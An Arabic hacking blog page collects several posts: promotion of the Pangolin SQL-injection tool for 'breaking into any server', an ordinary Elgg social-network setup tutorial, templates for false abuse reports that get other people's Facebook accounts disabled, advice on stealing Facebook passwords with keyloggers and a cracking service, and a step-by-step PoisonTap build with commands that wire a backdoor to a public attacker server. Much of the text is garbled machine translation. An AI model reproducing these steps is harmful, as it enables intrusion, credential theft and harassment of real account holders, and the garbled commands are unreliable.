اختراق قاعدة بيانات اي سرفر او موقع بواسطة برنامج Pangolin

Pangolin هي أداة اختبار الاختراق التلقائي (Pen-testing) لـ SQL لإدارة الموقع أو محلل أمن تكنولوجيا المعلومات.

تم النشر بواسطة: www.nosec-inc.comLicenseFreewareCost $ 0.00OS: 7 / 2k / XP / 2003 / VistaPopularity: 43٪ Support URL: www.nosec-inc.com/en/products/pangolin/ ​​مع:

nosec

حقن SQL

هدفه هو اكتشاف واستغلال الثغرات الأمنية لحقن SQL في تطبيقات الويب. بمجرد اكتشاف واحد أو أكثر من حقن SQL على المستضيف الهدف ، يمكن للمستخدم الاختيار من بين مجموعة متنوعة من الخيارات لتنفيذ بصمة شاملة لنظام إدارة قواعد البيانات الخلفية ، واسترداد المستخدم وقاعدة بيانات DBMS ، وتعداد المستخدمين ، وتجميع كلمات المرور ، والامتيازات ، وقواعد البيانات أو تفريغ جداول أو أعمدة DBMS كاملة أو مستخدم ، أو تشغيل عبارة SQL الخاصة به ، أو قراءة ملفات معينة في نظام الملفات وأكثر من ذلك.

ختبار العديد من أنواع قواعد البيانات تطبيقات الويب الخاصة بك باستخدام Access، DB2، Informix، Microsoft SQL Server 2000، Microsoft SQL Server 2005

اختبر العديد من أنواع قواعد البيانات

تطبيقات الويب الخاصة بك باستخدام Access، DB2، Informix، Microsoft SQL Server 2000، Microsoft SQL Server 2005، Microsoft SQL Server 2008، MySQL، Oracle، PostgreSQL، Sqlite3، Sybase؟

بانجولين يدعم كل منهم.

الميزات: تحليل تلقائي للكلمة الرئيسية ، دعم HTTPS ، إعداد مسبق لما قبل تسجيل الدخول ، وضع جدار الحماية في تجاوز الجدار ، حُفْر الحقن ، شاحنة البيانات ، إلخ.

الميزات

بانجولين Free Free & Safe تنزيل!

بانجولين مجاني أحدث إصدار!

يعمل مع جميع إصدارات ويندوز

اختيار المستخدمين!

تنصل

Pangolin Free هو منتج تم تطويره بواسطة Nosec. لا يرتبط هذا الموقع مباشرة مع Nosec. 

الغاء تثبيت Pangolin Free 

انقر فوق "ابدأ"

انقر فوق "لوحة التحكم"

تحت البرامج ، انقر فوق الرابط إلغاء تثبيت البرنامج.

حدد "Pangolin Free" وانقر بزر الماوس الأيمن ، ثم حدد Uninstall / Change.

انقر فوق "نعم" لتأكيد إلغاء التثبيت.

كيف أقوم بإلغاء تثبيت Pangolin Free في نظام التشغيل Windows XP؟

انقر فوق "ابدأ"

انقر فوق "لوحة التحكم"

انقر فوق الرمز "إضافة أو إزالة البرامج".

انقر على "Pangolin Free" ، ثم انقر على "إزالة / إلغاء التثبيت".

انقر فوق "نعم"

للراغبين بتحميل هذا البرنامج الخطير يرجى ترك تعليق او الاتصال بنا على الايميل او الفيس بوك

مع الشكر

انشاء موقع مشابه للفيس بوك تماما وبالتفصيل

طبعا فإنشاء موقع إجتماعي أصبح أسهل مما تتوقع نظرا لظهور العديد من برامج إدارة المحتوى المخصصة لإنشاء الشبكات الإجتماعية دون الحاجة إلى إنشائها من الصفر حيت توفر لك سكريبت جاهز ماعليك سوى تخصيصه حسب رغبتك والتعديل عليه ويكون موقعك جاهزا بكل خصائصه من إنشاء برفايل ومجموعات ورفع الصور وكتابة البوستات والتعليقات والإعجابات وغيرها من الخصائص التي تميز الشبكات الإجتماعية.

هناك العديد من أنظمة إدارة المحتوى منها ماهو مجاني والأخر مدفوع ومنها ماهو جيد وألأخر رديء والنظام الذي سنشرحه في هذا الدرس فهو نظام Elgg وهذا لا يعني أنه الوحيد الموجود فهناك أنظمة أخرى عديدة ومن بينها:

Pligg يشبه Arabia I\O و Stack OverFlow وهو مجاني

BuddyPress مجاني أيضا وهو مبني على الوردبريس

Dolphin غير مجاني

Oxwall مجاني

phpfox غير مجاني

SocialEngine غير مجاني

Ning غير مجاني

كما رأيتم هناك العديد من أنظمة إدارة المحتوى وإختيارنا لنظام Elgg لا يعني أنه الأفضل بل فقط إخترناه أولا لأنه علينا الإختيار ثانيا لأنه النظام الذي قمت بتجربته واكتشفت أنه نظام سهل وبسيط وغير معقد وقبل كل شيء فهو نظام مجاني ومفتوح المصدر لذالك فيمكنك البحث والتجريب حتى تجد النظام الدي يتوافق مع إحتياجاتك.

كما أود أن أنوه إلى أن إنشاء موقع إجتماعي لا يعني أنه سينجح مثل المواقع الشهيرة فمحاولة إنشاء موقع إجتماعي متل الفايسبوك مثلا فهي فاشلة ببساطة لأن الفايسبوك موجود أصلا لذلك عليك البحث عن فكرة مميزة ومختلفة كإنشاء موقع إجتماعي خاص بفئة معينة أو مايعرف بالنيتش، ولا أقول أن إنجاح موقع إجتماعي أمر مستحيل لكن هذا لا يحدث بين ليلة وضحاها.

لكي نتمكن من إنشاء موقع إجتماعي فإننا سنحتاج لخادم لنثبت عليه البرنامج وبما أننا سنجرب فقط فإننا سنحتاج لتحويل حاسوبنا إلى خادم وذلك عن طريق برنامج WAMPSERVER والذي يمكن تحميله من هناhttps://sourceforge.net/projects/wampserver/ 

ولمن مازال وفيا لويندوز إكسبي فالنسخ الحديثة من هذا البرنامج لا تعمل عليه لذلك يجب تحميل نسخة قديمة من هنا

طبعا إختيارنا لبرنامج WAMPSERVER لا يعني مرة أخرى أنه الوحيد الموجود، فهناك العديد من البرامج الأخرى التي تقوم بنفس الوظيفة.

بعد تحميل wampserver نقوم بتثبيته كأي برنامج عادي، وسيتم تثبيثه في المسار C:\wamp بعدها ستظهر علامة خضراء في شريط المهام، ما عليكم سوى الظغط عليها وإختيار Localhost أو الذهاب إلى المتصفح مباشرة وكتابة العنوان http://localhost وإن ظهرت صفحة كما في الصورة التالية فهذا يعني أن كل شيء يعمل جيدا، و نمر إلى المرحلة التالية وهي تحميل Elgg وتثبيته.

لتحميل Elgg نتوجه إلى الرابط  التالي . ونقوم بتحميل نسخة Elgg والتي تكون على شكل ملف مظغوط وأنصحكم بتحميل النسخة 1.8.20 لأن النسخة التي فوقها حديثة ومازالت غير مستقرة وفيها بعض المشاكل.

بعدها نقوم بفك الضغط عن الملف الذي قمنا بتحميله ونضعه في المسار التالي: C:\wamp\www

بعد ذلك نفتح المتصفح وندخل إلى العنوان http://localhost أو ببساطة ننقر على الأيقونة جنب الساعة تم نختار loacalhost ومن الصفحة التي ستظهر ننقر على اسم المجلد الذي توجد فيه ملفات Elgg والذي سنجده في التصنيف MY Projects كما في الصورة التالية:

بعد ذلك ستظهر صفحة الترحيب لتثبيت Elgg كما توضح الصورة التالية:

نضغط على Next وستظهر الصورة التالية:

المربع الأصفر يخبرنا أن هناك مشكلة ما، ولحل هذا المشكل ما عليك سوى الظغط على الأيقونة الخضراء تم إختيار Apach ثم Apache Modules وأخيرا إضغط على rewrite_module بعدها إظغط Refresh وإذا أصبح لون المربع الأصفر أخضر فهذا يعني أن كل شيء على ما يرام حينها إضغط Next وسنمر إلى المرحلة الموالية.

في هذه المرحلة سيطلب منا Elgg إدخال معلومات الإتصال بقاعدة البيانات لذلك يتوجب علينا إنشاء قاعدة بيانات، ولفعل ذلك نفتح نافدة جديدة في المتصفح وندخل إلى العنوان التالي http://localhost/phpmyadmin/ وستظهر صفحة كما في الصورة أسفله:

ما عليك سوى كتابة إسم معين لقاعدة البيانات في المربع تم الضغط على الزر Créer وانتهى الأمر، تم إنشاء قاعدة البيانات.

والأن نعود إلى صفحة تثبيت Elgg وكنا توقفنا في المرحلة التالية:

وستكتبون فيها المعلومات التالية:

Database Username: في هذا المربع أكتب root

Database Password: أتركه فارغا لا تكتب أي شيء

Database Name: إسم قاعدة البيانات التي أنشأتها

والباقي أتركه كما هو واظغط Next وستظهر صفحة المرحلة التالية وهي كما في الصورة:

في المربع الأول Site Name أكتب إسم موقعك الاجتماعي

و المربع الثاني والثالث والرابع أتركهما دون تعديل

قبل أن نكمل باقي المعلومات سيكون علينا إنشاء مجلد لحفظ البيانات حيث ستحفظ فيه الصور والأيقونات وصور البروفيل وغيرها ومن الأفضل أن يكون الملف بإسم data وأن يتم وضعه خارج ملف تثبيت Elgg لتأمينه. يعني مثلا لو تم تثبيت elgg في المسار

C:\wamp\www\elgg فيجب إنشا ملف البيانات في المسار C:\wamp\www\data. وعندما ننتهي من إنشاء المجلد نكمل باقي المعلومات.

حيث في المربع الخامس Elgg Install Directory نكتب فيه المسار أو عنوان المكان الذي أنشأنا فيه مجلد data.

وأخيرا نظغط Next. ستظهر صفحة أخرى حيت سننشيء حساب الأدمين

في المربع الأول نكتب الإسم وفي الثاني نكتب البريد الإلكتروني وفي الثالث نكتب إسم المستخدم وفي الرابع كلمة المرور وفي الخامس نعيد كتابة كلمة المرور تم نظغط Next.

هنئا لقد أنشأت موقع إجتماعي، الأن في الصفحة التي تظهر إظغط على Go to site وسيتم تحويلك إلى لوحة تحكم الادمين وهي كالتالي:

لزيارة موقعك إظغط على View site وسيكون كالتالي:

 لزيارة موقعك إظغط على View site وسيكون كالتالي:

يمكنكم تغيير شكله وتخصيصه كما تريدون عن طريق إضافة الثيمات كهذا الثيم الذي يجعله مثل فايسبوك تقريبا:

ولتحميل هذا الثيم أو ثيمات أخرى فستجدونها في هذا الموقع 

وإن كانت لك دراية سابقة بلغات إنشاء المواقع فيمكنك إنشاء ثيم خاص بك بعد فهم أساسيات البرنامج.

وأما فيما يخص طريقة تركيب الثيم فهي كالتالي:

عند تحميل التيم يكون على شكل ملف مظغوط ، نفك عنه الظغط ونضعه في المسار التالي:

C:\wamp\www\elgg-1.8.20\mod أي داخل مجلد mod بعدها تدخل إلى لوحة التحكم في موقعك ثم تظغط على Plugins وتبحث عن الثيم الذي أضفته وعندما تجده تظغط على Activate وأخيرا تدخل إلى الموقع وستجده بالثيم الجديد.

وإلى هنا نأتي إلى نهاية الدرس وأتمنى أن ينال إعجابكم وأن يكون واضحا والسلام عليكم 

طرق مؤكدة لتعطيل وأغلاق حسابات الفيس بوك

لقد اصبح تعطيل او الابلاغ عن حسابات الفيس بوك هواية وانتقام لا داع له الا في حالة الضرورة 

اليكم ادناه بعض الروابط التي يستخدمها الفيس بوك لغرض المراجعة وان كانت صحيحة سيتم التعطيل 

ملاحضة

لا تعتقد بانه يمكنك تعطيل اي حساب بمجرد الابلاغ يجي توفر شروط الفيس لمعايير المجتمع وبامكانك تغيير الرسالة حسب الرغبة ولا تنسى ان كنت له صديق باستعمالك المسنجر وجعل صديقك يسب ويشتمك ويهددك الابلاغ سيكون اقوى وقد جربتها مع شخص كان يسبني والصورة ادناه الدليل بحيث في اقل من نصف ساعه تم تعطيل حسابه

والان لنبداء 

ابتزاز
https://www.facebook.com/help/contact/567360146613371
الرسالة الاولى
Hello, I want to tell you that this person Adinina The me and that person is sane or not qualified to Facebook or mentally ill, and should take the thing about it because it is causing a threat to Facebook, and thank you for your effort to make you Facebook security and strong thanks
الرسالة الثانية
Hello, I want to tell you that this person does not use his real name Blfaspock, uses this name as a fake and he forged his name when he joined the company Facebook, please take something about it Hetta does not cause harm to the ank you for Matbzlouna of effort in order to make you Elvis Thanks strong and Security
شخص مريض او مصاب او مهمل
https://www.facebook.com/help/contact/191122007680088

شخص ميت

https://www.facebook.com/help/contact/?id=228813257197480

الإبلاغ عن طفل دون السن القانونية
https://www.facebook.com/help/contact/209046679279097

He was a child account and publish things false and violates the sanctity of facebook I hope to remove the page

انتهاك شروط فيس بوك

ورى 12 ساعة يطير
https://www.facebook.com/help/contact/274459462613911

He was a child account and publish things false and violates the sanctity of facebook I hope to remove the page ...

عن تجربة اتكلم 

لاي استفسار اترك رسالة او تعليق في الاسفل

هل يمكننا اختراق كلمة مرور الفيس بوك՞ Can we Hack Facebook password

دائمًا ما يكون القراصنة الأفضل في اختراق كلمة مرور FB. هناك بعض الذين يستخدمون كيلوغرز ، صفحات التصيد ، ولكن بعض يذهب أبعد من ذلك. يستخدمون تقنية تسمى "Bait and Switch Hacking".

سيشتري المخترق مساحة إعلانية على مواقع الإنترنت ويلتزم بإعلاناته التي تحجب رابطًا خطيرًا. على وجه التحديد ، عندما ينقر مستخدم على الإعلان ، سيتم توجيهه إلى صفحة مصابة ببرامج ضارة. دون أن يلاحظ المستخدم أي شيء ، سيواصل المتسللون تثبيت برامج ضارة على جهاز الكمبيوتر أو الهاتف الذكي التابع للضحية. خاصة وأن هذه السلسلة لا نهاية لها منذ أن تم تركيب الفيروس ، سيكون بمقدورهم إعادة إنتاج أنفسهم إلى ما لا نهاية.

سيضطر المخترق فقط إلى الانتظار لاستلام بريده الإلكتروني معرف حساب فيس بوك بكلمة مروره. فكر مرتين ، ويمكن للهاكر اختراق كلمة المرور الخاصة بك FB ببساطة كما كنت لن ترى ذلك. إنها أسهل بكثير مما تتخيل. يمتلك المتسللون مئات الاحتمالات لسرقة كلمة مرور ، وتصبح تقنياتهم أكثر تعقيدًا. في الوقت الحاضر ، يعتقد معظم المستخدمين أنهم آمنون على الإنترنت. من الصعب تخيل إمكانية سرقة حياة المرء وأصدقائه وهويته على شبكة الإنترنت. كلنا نقول أن هذا يحدث فقط للآخرين وهذا لن يحدث لنا ، ومع ذلك ، في يوم حدوث ذلك ، نسأل أنفسنا كيف وصلنا إلى هناك. قبل بضع سنوات ، قدر التحالف الوطني للأمن الإلكتروني فرصًا ليكون 20٪ سنويًا.

                                                                                              هنالك عدة طرق لاختراق الفيس بوك البعض يظن انه زر بمجرد الضغط عليه ستتمكن من الاختراق وهذا خطاء وانما بالطرق التي شرحتها اعلاه مع بعض الخبرة الضرورية يمكن ذلك 

                                                                                                هناك بعض البرامج التي يجب ان تدفع مقابلها يمكن ان تجلب لك هذا النوع من الاختراق 

منها هذا البرنامج القوي فعلا وليس من النوع الكاذب 

https://www.passwordrevelator.net/en/passfinder.php  

                                                                                                      استعمال برامج ((كي لوجرز))

لايتطلب خبرة قوية وهي سهلة الاستعمال ومفعولها قوي جدا ولا اعتقد ان لا احد لا يعرفها 

برنامج كيلوجر Keylogger من افضل البرامج حاليا في مجال مراقبة اجهزة الكمبيوتر

       او برنامج ارداماكس القوي لانتاج سرفر كي لوجر وارساله

+++++++++++++++++++++++++++++++++++++++++

وساتكلم لاحقا عن طرق تعطيل الحسابات لان الفيس بوك قد زود المستخدمين بعدة 

 مصادر ولينكات للبلاغ الحقيقي عن اي حساب زائف وماشاكله 

هذه معلومات عامة يحتاجها اي شخص 

اخطر مفتاح يو اس بي قادر على اختراق اي حاسوب يتم توصيله به حتى لو مغلق بكلمة مرور

شكرا على زيارتك اتمنى ان تعود

Samy Kamkar وهو باحت امني مثير للجدل له العديد من الادوات التي يستطيع من خلالها تنفيد مجموعة من الاشياء الغريبة التي قد تبدو لك مستحيلة او غير ممكنة ، له انجازات كثيرة في مجال الامن والحماية ، 

 اخر ما توصل اليها هذا الشخص في هذا المجال ، وهو عبارة عن مفتاح يو اس بي ، يقوم باختراق اي حاسوب بعد ربطه معه  حتى لو كان الجهاز مغلق بكلمة سركما ان مضادات الفايروسات لايمكنها عمل شيء معه!

هذه الاداة الخطيرة تسمى "PoisonTap" حيث تستطيع هذه الاداة من اختراق اي حاسوب تثبيت مجموعة من الأبواب الخلفية backdoor على شبكة الإنترنت الخاصة به والتي تسمح للمهاجم بالوصول إلى حسابات الضحية على الانترنت، ومواقع الشبكة الداخلية للشركات، أو حتى جهاز التوجيه الخاصة بهم.وبدلا من استغلال أي ثغرة أمنية مكشوفة ، تقوم هذه الاداة بالهجوم عن طريقة سلسلة من الثغرات الامنية والعيوب البرمجية الموجودة في نظام التشغيل ومتصفح الانترنت ، ، مما يجعل الهجوم أصعب بكثير للحماية ضده.

الوقت الذي تحتاجه هذه الاداة لا يتجاوز دقيقة واحدة ، وهذا ما يجعل اكثر خطورة ، حيث بامكان اي شخص استعمالها في مكاتب الشركات والادارات وما الى ذلك . كما ثمنه لا يتعدى 5 دولارات .Samy Kamkarنشر فيديو على قناته في اليوتيوب يشرح فيه الاداة بالتفصيل ، مع عملية اختراق لاحد الحواسيب 

والان ماذا ستحتاج وماهي الادوات اللازمة والاوامر الخاصة

______________________________________:

A Raspberry pi zero.

خادم ويب يمكن الوصول إليه بشكل عام.

بطاقة SD (لتثبيت raspbian على - يجب أن يكون 16 جيجابايت على الأقل).

كابل USB صغير.

ستحتاج اولا الى

بناء الصورة

قم بتشغيل أوامر linux / unix التالية لتثبيت raspbian على بطاقة sd الخاصة بك

آخر تسجيل دخول: Sun Feb 19 15:16:09 on ttys001

MBP: ~ secsleuth $ ls

2017/03/02-raspbian-jessie.img

MBP: ~ secsleuth $ sudo dd bs = 1m if = 2017-03-02-raspbian-jessie.img of = / dev / disk2

4190 + 0 يسجل في

تسجيل 4190 + 0

4393533440 بايت المنقولة في 1346.772204 ثانية (3262269 بايت / ثانية)

MBP: ~ secsleuth $  (يمكن هنا تغيير الاسم او الاحتفاظ به للسهولة )

بعد إنشاء الصورة ، نحتاج إلى إنشاء ملف يسمى "ssh" ونسخه إلى جذر بطاقة SD بحيث يمكن الوصول إلى pi0 عبر ssh

تثبيت الأدوات على الخادم الخاص بك

عند تشغيل poisontap ، ستحتاج إلى خادم من أجل pi0 لبيانات الأنابيب ، يمكنك تشغيل الخادم الخاص بك وتشغيله عن طريق تشغيل الأوامر التالية:

$ sudo apt-get install git npm

$ سودو npm تثبيت websocket

$ curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash -

$ sudo apt-get install nodejs

$ git clone https://github.com/samyk/poisontap

CD $ poisontap

عقدة sudo $ backend_server.js &

السبت 01 أبريل 2017 08:30:47 GMT + 0000 (UTC) يستمع الخادم على المنفذ 1337

الآن الخادم الخاص بك هو جاهز والاستماع ل poisontap الخاص بك. يرجى ملاحظة أنه يجب أن يكون الخادم الخاص بك متاحًا للجمهور العام حتى يستخدم هذا الخادم مثيلًا مستضافًا لخدمة AWS.

تكوين صنبور السم الخاص بك

مثلما فعلنا فقط مع خادم الويب ، يجب علينا الآن إدخال ssh في pee0 للتوت وإكمال إعداد poisontap باستخدام الأوامر التالية:

$ sudo apt-get -y install isc-dhcp-server dsniff git

$ curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash -

$ sudo apt-get install nodejs

$ git clone https://github.com/samyk/poisontap

CD $ poisontap

الآن قم بتحديث ملف backdoor.html للإشارة إلى خادم الويب الذي قمنا بإعداده مسبقًا:

var socket = new WebSocket ('ws: // <amazon EC2 instance address>: 1337')؛

بعد ذلك ، نحتاج إلى إضافة ما يلي إلى أسفل ملف / etc / network / interfaces

السيارات usb0

    allow-hotplug usb0

    iface usb0 inet ثابت

    العنوان 1.0.0.1

    قناع الشبكة 0.0.0.0

الآن نحن بحاجة إلى تحديث التكوين DHCP في pi0 للعمل مع poisontap لذا قم بتشغيل الأمر التالي:

$ sudo cp -f dhcpd.conf /etc/dhcp/dhcpd.conf

نحتاج أيضًا إلى إضافة الإدخال التالي إلى أسفل الملف / etc / default / isc-dhcp-server:

واجهات = "usb0"

الآن نحن بحاجة فقط إلى التأكد من أن poisontap يعمل عند بدء التشغيل حتى نتمكن 

من القيام بذلك نحن بحاجة إلى تشغيل الأوامر التالية:

$ sudo cp /home/pi/poisontap/pi_startup.sh /etc/init.d/

$ sudo chmod + x /etc/init.d/pi_startup.sh

ونحن بحاجة لإضافة أدناه إلى ملف /etc/rc.local فقط قبل أن يقول الخروج 0

/etc/init.d/pi_startup.sh &

وهذا الآن جهاز poisontap الخاص بك جاهز!

الاستنتاجات

أنت الآن على استعداد للذهاب مع جهاز poisontap الخاص بك! هنا نظرة على الإعداد النهائي الخاص بك:

وحسب علمي موقع امازون وموقع اي بي لديهم هذه الادوات تستطيع شرائها كمجموعه كاملة او شرائها على اجزاء 

وهناك جهاز كامل لاتحتاج الى اي عمليات او اوامر لانها جاهزة للعمل كل ماعليك فعله هو تحضير sd 

هنا موقع امازون وعروضه اضغط على الصورة للذهاب الى الموقع

وشكرا لكم